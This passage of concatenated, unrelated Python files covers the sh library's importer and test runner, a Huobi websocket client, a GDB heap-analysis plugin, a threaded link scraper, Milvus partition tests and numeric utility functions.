mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
while parent_frame and in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# Calling PyImport_ImportModule("some_module"); via the C API may not
# have a parent frame. Early-out to avoid in_importlib() trying to
# get f_code from None when looking for 'some_module'.
# This also happens when using gevent apparently.
if not parent_frame:
return None
# this line is saying "hey, does mod_fullname exist as a name we've
# defind previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
def run_tests(env, locale, args, version, force_select, **extra_env): # pragma: no cover
py_version = "python"
py_version += str(version)
py_bin = which(py_version)
return_code = None
poller = "poll"
if force_select:
poller = "select"
if py_bin:
print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(),
locale, poller))
env["SH_TESTS_USE_SELECT"] = str(int(force_select))
env["LANG"] = locale
for k,v in extra_env.items():
env[k] = str(v)
cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + args[1:]
print("Running %r" % cmd)
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, env)
return_code = launch()
return return_code
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-e", "--envs", dest="envs", action="append")
parser.add_option("-l", "--locales", dest="constrain_locales", action="append")
options, args = parser.parse_args()
envs = options.envs or []
constrain_locales = options.constrain_locales or []
return args, envs, constrain_locales
# these are essentially restrictions on what envs/constrain_locales to restrict to for
# the tests. if they're empty lists, it means use all available
args, constrain_versions, constrain_locales = parse_args()
action = None
if args:
action = args[0]
if action in ("test", "travis", "tox"):
import test
coverage = None
if test.HAS_UNICODE_LITERAL:
import coverage
env = os.environ.copy()
env["SH_TESTS_RUNNING"] = "1"
if coverage:
test.append_module_path(env, coverage)
# if we're testing locally, run all versions of python on the system
if action == "test":
all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
# if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
# python version in our .travis.yml file, and tox will run its matrix via tox.ini
elif action in ("travis", "tox"):
v = sys.version_info
sys_ver = "%d.%d" % (v[0], v[1])
all_versions = (sys_ver,)
all_force_select = [True]
if HAS_POLL:
all_force_select.append(False)
all_locales = ("en_US.UTF-8", "C")
i = 0
ran_versions = set()
for locale in all_locales:
# make sure this locale is allowed
if constrain_locales and locale not in constrain_locales:
continue
for version in all_versions:
# make sure this version is allowed
if constrain_versions and version not in constrain_versions:
continue
for force_select in all_force_select:
env_copy = env.copy()
ran_versions.add(version)
exit_code = run_tests(env_copy, locale, args, version,
force_select, SH_TEST_RUN_IDX=i)
if exit_code is None:
print("Couldn't find %s, skipping" % version)
elif exit_code != 0:
print("Failed for %s, %s" % (version, locale))
exit(1)
i += 1
print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
register_importer()
|
ws_utils.py | import websocket
import threading
import gzip
import json
from datetime import datetime
from urllib import parse
import hmac
import base64
from hashlib import sha256
from alpha.platforms.huobi_usdt_swap.logger import *
import time
class WsUtils:
def __init__(self, path: str, host: str = None, access_key: str = None, secret_key: str = None):
self._path = path
if host is None:
host = "api.btcgateway.pro"
self._host = host
url = 'wss://{}{}'.format(host, path)
logger.info(url)
self._ws = websocket.WebSocketApp(url,
on_open=self._on_open,
on_message=self._on_msg,
on_close=self._on_close,
on_error=self._on_error)
self._worker = threading.Thread(target=self._ws.run_forever)
self._worker.start()
self._has_open = False
self._auth = True
self._access_key = access_key
self._secret_key = secret_key
if access_key is not None or secret_key is not None:
self._auth = False
self._sub_str = None
self._sub_callback = None
self._req_callback = None
self._active_close = False
def __del__(self):
self.close()
def _send_auth_data(self, method: str, path: str, host: str, access_key: str, secret_key: str):
# timestamp
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
# get Signature
suffix = 'AccessKeyId={}&SignatureMethod=HmacSHA256&SignatureVersion=2&Timestamp={}'.format(
access_key, parse.quote(timestamp))
payload = '{}\n{}\n{}\n{}'.format(method.upper(), host, path, suffix)
digest = hmac.new(secret_key.encode('utf8'), payload.encode(
'utf8'), digestmod=sha256).digest()
signature = base64.b64encode(digest).decode()
# data
data = {
"op": "auth",
"type": "api",
"AccessKeyId": access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp,
"Signature": signature
}
data = json.dumps(data)
self._ws.send(data)
logger.debug(data)
def _on_open(self):
logger.info('ws open.')
if self._auth == False:
self._send_auth_data('get', self._path, self._host,
self._access_key, self._secret_key)
self._has_open = True
def _on_msg(self, message):
plain = gzip.decompress(message).decode()
jdata = json.loads(plain)
if 'ping' in jdata:
sdata = plain.replace('ping', 'pong')
self._ws.send(sdata)
elif 'op' in jdata:
opdata = jdata['op']
if opdata == 'ping':
sdata = plain.replace('ping', 'pong')
self._ws.send(sdata)
elif opdata == 'auth':
if jdata['err-code'] == 0:
self._auth = True
logger.info(plain)
elif opdata == 'sub':
logger.info(plain)
elif opdata == 'unsub':
logger.info(plain)
elif opdata == 'notify':
if self._sub_callback is not None:
self._sub_callback(jdata)
else:
pass
elif 'subbed' in jdata:
logger.info(plain)
elif 'ch' in jdata:
if self._sub_callback is not None:
self._sub_callback(jdata)
elif 'rep' in jdata:
if self._req_callback is not None:
self._req_callback(jdata)
self._req_callback = None
else:
pass
def _on_close(self):
logger.info("ws close.")
if not self._active_close and self._sub_str is not None:
self.sub(self._sub_str, self._sub_callback)
def _on_error(self, error):
logger.error(error)
def _sub(self, sub_str: str, callback):
while not self._has_open:
time.sleep(1)
self._sub_str = sub_str
self._sub_callback = callback
self._ws.send(sub_str)
logger.debug(sub_str)
def _unsub(self, unsub_str: str):
while not self._has_open:
time.sleep(1)
self._sub_str = None
self._sub_callback = None
self._ws.send(unsub_str)
logger.debug(unsub_str)
def _req(self, req_str: str, callback):
while not self._has_open:
time.sleep(1)
self._req_callback = callback
self._ws.send(req_str)
logger.info(req_str)
def close(self):
self._active_close = True
self._sub_str = None
self._sub_callback = None
self._req_callback = None
self._ws.close()
|
__init__.py | """The heap package is a Python extension for GDB which adds support for
analyzing the heap.
Currently only one heap implementation, that of glibc, is supported.
"""
import _gdb as gdb
import sys
import threading
from _heap import HeapDetectionError, WrongHeapVersionError, UnsupportedHeap
from glibc import detect_glibc_heap
from commands import activate_basic_commands
# Always import any non-standard GDB helpers from _gdb
from _gdb import watch_active_inferior
_heap_detectors = [detect_glibc_heap]
# Sanity check that we have the minimum supported version. This is just a
# precaution, I don't think GDB embedded any Python versions under 2.6
assert sys.version_info[0:2] >= (2, 6)
# GDB can have multiple inferiors and in theory each of these inferiors
# might have a different heap implementation. As such, we have to keep a
# different analyzer for each inferior, and try to be smart about swapping
# between inferiors. This includes activating commands on a per-inferior
# basis, which can be accomplished by simply registering the commands again
# in the correct order.
class AnalyzerState(object):
"""Class to keep track of the current state of the overall extension, such
as which inferior the analyzer is working on.
For all intents and purposes, this class is a singleton, but not enforced.
This class also has basic thread-safety by coarse level, recursive locking.
"""
def __init__(self):
self._lock = threading.RLock()
self.inferior_to_analyzer_map = dict.fromkeys(gdb.inferiors(), None)
# Use a background thread to monitor if the user switches inferiors
background_function = lambda: watch_active_inferior(self.on_inferior_change,
gdb.selected_inferior())
inferior_watcher = threading.Thread(target=background_function)
inferior_watcher.daemon = True
inferior_watcher.start()
def get_current_analyzer(self):
with self._lock:
inferior = gdb.selected_inferior()
# Use setdefault in case this is a new inferior we haven't seen
return self.inferior_to_analyzer_map.setdefault(inferior, None)
def detect_heap(self):
with self._lock:
inferior = gdb.selected_inferior()
# Assert that this inferior has not already been detected
assert self.inferior_to_analyzer_map[inferior] is None
heap_analyzer = UnsupportedHeap
for detector in _heap_detectors:
try:
heap_analyzer = detector(inferior)
break
except HeapDetectionError:
pass # Expected error
except WrongHeapVersionError, e:
print "INFO: Unsupported heap version detected: {0}".format(e)
break
self.inferior_to_analyzer_map[inferior] = heap_analyzer
return heap_analyzer
def on_inferior_change(self, new_inferior):
with self._lock:
# First wipe the active commands back to basics
activate_basic_commands(self)
# Check to see if an analyzer exists yet for this inferior
analyzer = self.inferior_to_analyzer_map.setdefault(new_inferior, None)
# If one does, activate the commands for it
if analyzer is not UnsupportedHeap and analyzer is not None:
analyzer.activate_commands()
# Register the basic heap commands
activate_basic_commands(AnalyzerState()) |
scraper.py | #encoding:utf-8
import threading
import Queue
import urlparse
import requests
import bs4
class ScraperWorkerBase(object):
"""
No needs to learn how is work,
rewrite parse_page using self.soup(Beautiful), and return result,
you can get the result by using
(inpage_urls, your_own_result) urlscraper.execute()
"""
def __init__(self, url = ''):
self.target_url = url
self.netloc = urlparse.urlparse(self.target_url)[1]
self.response = None
self.soup = None
self.url_in_site = []
self.url_out_site = []
def __get_html_data(self):
try:
self.response = requests.get(self.target_url, timeout = 5)
except:
return ""
print "[_] Got response"
return self.response.text
def __get_soup(self):
text = self.__get_html_data()
if text == '':
return []
return bs4.BeautifulSoup(text)
#return soup
def __get_all_url(self):
url_lists = []
self.soup = self.__get_soup()
if isinstance(self.soup, type(None)):
return []
all_tags = self.soup.findAll("a")
for a in all_tags:
try:
#print a['href']
url_lists.append(a["href"])
except:
pass
return url_lists
def get_urls_inpage(self):
ret_list = self.__get_all_url()
if ret_list == []:
return ([],[])
else:
for url in ret_list:
o = urlparse.urlparse(url)
#
#print url
if self.netloc in o[1]:
self.url_in_site.append(o.geturl())
else:
self.url_out_site.append(o.geturl())
inurlset = set(self.url_in_site)
outurlset = set(self.url_out_site)
return inurlset, outurlset
def execute(self):
inpage_url = self.get_urls_inpage()
undefined_result = self.parse_page()
return inpage_url, undefined_result
def parse_page(self):
pass
class Scraper(object):
def __init__(self, single_page = True, workers_num = 8, worker_class = ScraperWorkerBase):
self.count = 0
self.workers_num = workers_num
"""get worker_class"""
self.worker_class = worker_class
"""check if the workers should die"""
self.all_dead = False
"""store the visited pages"""
self.visited = set()
"""by ScraperWorkerBase 's extension result queue"""
self.result_urls_queue = Queue.Queue()
self.result_elements_queue = Queue.Queue()
"""
if single_page == True,
the task_queue should store the tasks (unhandled)
"""
self.task_queue = Queue.Queue()
self.single_page = single_page
if self.single_page == False:
self.__init_workers()
else:
self.__init_single_worker()
def __check_single_page(self):
if self.single_page == True:
raise StandardError('[!] Single page won\'t allow you use many workers')
"""init worker(s)"""
def __init_single_worker(self):
ret = threading.Thread(target=self._single_worker)
ret.start()
def __init_workers(self):
self.__check_single_page()
for _ in range(self.workers_num):
ret = threading.Thread(target=self._worker)
ret.start()
"""return results"""
def get_result_urls_queue(self):
return self.result_urls_queue
def get_result_elements_queue(self):
return self.result_elements_queue
"""woker function"""
def _single_worker(self):
if self.all_dead != False:
self.all_dead = False
scraper = None
while not self.all_dead:
try:
url = self.task_queue.get(block=True)
print 'Workding', url
try:
if url[:url.index('#')] in self.visited:
continue
except:
pass
if url in self.visited:
continue
else:
pass
self.count = self.count+ 1
print 'Having process', self.count , 'Pages'
scraper = self.worker_class(url)
self.visited.add(url)
urlset, result_entity = scraper.execute()
for i in urlset[0]:
#self.task_queue.put(i)
self.result_urls_queue.put(i)
if result_entity != None:
pass
else:
self.result_elements_queue.put(result_entity)
except:
pass
finally:
pass
def _worker(self):
if self.all_dead != False:
self.all_dead = False
scraper = None
while not self.all_dead:
try:
url = self.task_queue.get(block=True)
print 'Workding', url
try:
if url[:url.index('#')] in self.visited:
continue
except:
pass
if url in self.visited:
continue
else:
pass
self.count = self.count + 1
print 'Having process', self.count , 'Pages'
scraper = self.worker_class(url)
self.visited.add(url)
urlset, result_entity = scraper.execute()
for i in urlset[0]:
if i in self.visited:
continue
else:
pass
self.task_queue.put(i)
self.result_urls_queue.put(i)
if result_entity != None:
pass
else:
self.result_elements_queue.put(result_entity)
except:
pass
finally:
pass
"""scraper interface"""
def kill_workers(self):
if self.all_dead == False:
self.all_dead = True
else:
pass
def feed(self, target_urls = []):
if isinstance(target_urls, list):
for target_url in target_urls:
self.task_queue.put(target_url)
elif isinstance(target_urls, str):
self.task_queue.put(target_urls)
else:
pass
#return url result
return (self.get_result_urls_queue(), self.get_result_elements_queue() )
|
test_partition.py | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
"""
target: verify the response when creating a partition with a non_existing collection
method: create a partition with a non_existing collection
expected: raise an exception
"""
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_none(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
utilities.py | from __future__ import with_statement
__author__ = 'Tom Schaul, tom@idsia.ch; Justin Bayer, bayerj@in.tum.de'
import gc
import pickle
import logging
import threading
import os
import operator
from itertools import count
from math import sqrt
from random import random, choice
from string import split
from scipy import where, array, exp, zeros, size, mat, median
# file extension for load/save protocol mapping
known_extensions = {
'mat': 'matlab',
'txt': 'ascii',
'svm': 'libsvm',
'pkl': 'pickle',
'nc' : 'netcdf' }
def abstractMethod():
""" This should be called when an abstract method is called that should have been
implemented by a subclass. It should not be called in situations where no implementation
(i.e. a 'pass' behavior) is acceptable. """
raise NotImplementedError('Method not implemented!')
def drawIndex(probs, tolerant=False):
""" Draws an index given an array of probabilities.
:key tolerant: if set to True, the array is normalized to sum to 1. """
if not sum(probs) < 1.00001 or not sum(probs) > 0.99999:
if tolerant:
probs /= sum(probs)
else:
print probs, 1 - sum(probs)
raise ValueError()
r = random()
s = 0
for i, p in enumerate(probs):
s += p
if s > r:
return i
return choice(range(len(probs)))
def drawGibbs(vals, temperature=1.):
""" Return the index of the sample drawn by a softmax (Gibbs). """
if temperature == 0:
# randomly pick one of the values with the max value.
m = max(vals)
best = []
for i, v in enumerate(vals):
if v == m:
best.append(i)
return choice(best)
else:
temp = vals / temperature
# make sure we keep the exponential bounded (between +20 and -20)
temp += 20 - max(temp)
if min(temp) < -20:
for i, v in enumerate(temp):
if v < -20:
temp[i] = -20
temp = exp(temp)
temp /= sum(temp)
return drawIndex(temp)
def iterCombinations(tup):
""" all possible of integer tuples of the same dimension than tup, and each component being
positive and strictly inferior to the corresponding entry in tup. """
if len(tup) == 1:
for i in range(tup[0]):
yield (i,)
elif len(tup) > 1:
for prefix in iterCombinations(tup[:-1]):
for i in range(tup[-1]):
yield tuple(list(prefix) + [i])
def setAllArgs(obj, argdict):
""" set all those internal variables which have the same name than an entry in the
given object's dictionary.
This function can be useful for quick initializations. """
xmlstore = isinstance(obj, XMLBuildable)
for n in argdict.keys():
if hasattr(obj, n):
setattr(obj, n, argdict[n])
if xmlstore:
obj.argdict[n] = argdict[n]
else:
print 'Warning: parameter name', n, 'not found!'
if xmlstore:
if not hasattr(obj, '_unknown_argdict'):
obj._unknown_argdict = {}
obj._unknown_argdict[n] = argdict[n]
def linscale(d, lim):
""" utility function to linearly scale array d to the interval defined by lim """
return (d - d.min())*(lim[1] - lim[0]) + lim[0]
def percentError(out, true):
""" return percentage of mismatch between out and target values (lists and arrays accepted) """
arrout = array(out).flatten()
wrong = where(arrout != array(true).flatten())[0].size
return 100. * float(wrong) / float(arrout.size)
def formatFromExtension(fname):
"""Tries to infer a protocol from the file extension."""
_base, ext = os.path.splitext(fname)
if not ext:
return None
try:
format = known_extensions[ext.replace('.', '')]
except KeyError:
format = None
return format
class XMLBuildable(object):
""" subclasses of this can be losslessly stored in XML, and
automatically reconstructed on reading. For this they need to store
their construction arguments in the variable <argdict>. """
argdict = None
def setArgs(self, **argdict):
if not self.argdict:
self.argdict = {}
setAllArgs(self, argdict)
class Serializable(object):
"""Class that implements shortcuts to serialize an object.
Serialization is done by various formats. At the moment, only 'pickle' is
supported.
"""
def saveToFileLike(self, flo, format=None, **kwargs):
"""Save the object to a given file like object in the given format.
"""
format = 'pickle' if format is None else format
save = getattr(self, "save_%s" % format, None)
if save is None:
raise ValueError("Unknown format '%s'." % format)
save(flo, **kwargs)
@classmethod
def loadFromFileLike(cls, flo, format=None):
"""Load the object to a given file like object with the given protocol.
"""
format = 'pickle' if format is None else format
load = getattr(cls, "load_%s" % format, None)
if load is None:
raise ValueError("Unknown format '%s'." % format)
